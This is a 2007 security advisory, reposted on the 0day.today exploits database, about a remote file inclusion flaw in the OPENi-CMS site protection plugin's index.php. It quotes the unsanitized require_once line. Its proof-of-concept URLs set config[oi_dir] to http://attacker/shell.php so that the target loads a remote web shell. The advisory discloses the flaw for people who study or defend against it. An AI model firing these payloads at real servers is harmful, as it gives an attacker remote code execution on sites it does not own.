[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability

Author
y3dips
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1492
Category
web applications
Date add
11-02-2007
Platform
unsorted
====================================================================
OPENi-CMS Site Protection Plugin Remote File Inclusion Vulnerability
====================================================================



------------------------------------------------------------------------------------
[ECHO_ADV_64$2007] Openi CMS plugins (site protection) remote file inclusion
------------------------------------------------------------------------------------

Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : February, 11 2007
Location : Indonesia, Jakarta
Critical Lvl : Critical
------------------------------------------------------------------------------------


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Internal range (site protection), version: 1.0
Openi CMS plugins (http://www.openi-cms.org)

Description : With this Plugin you can release page ranges only for certain users. The user
must authentifizieren itself with user name and password. Several users for
a page range can be put on. Users and sides which can be protected are put on
in the editorship environment by the administrator.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Variables "oi_dir" in index.php are not properly sanitized.

---------------index.php --------------------
...
<?PHP
global $config;
require_once($config["oi_dir"]."/base/sitemap_classes.php");

class plg_site_protection extends Plugin {
...
----------------------------------------------


An attacker can exploit this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~~~~~

http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php ?

Notes:
~~~~~~

i have to change the variable "oi_dir" to "openi_dir" to get the cms works (config file),
but then u just change the exploit to

http://target-openi/open-admin/plugins/site_protection/index.php?config%5bopeni_dir%5d=http://attacker/shell.php?

it doesnt matter coz the variable still unsanitized.

---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ my lovely ana
~ k-159 (never stop advising [pushing] me :P), the_day (echo young evil thinker),
~ and all echo staff



#  0day.today [2024-12-25]  #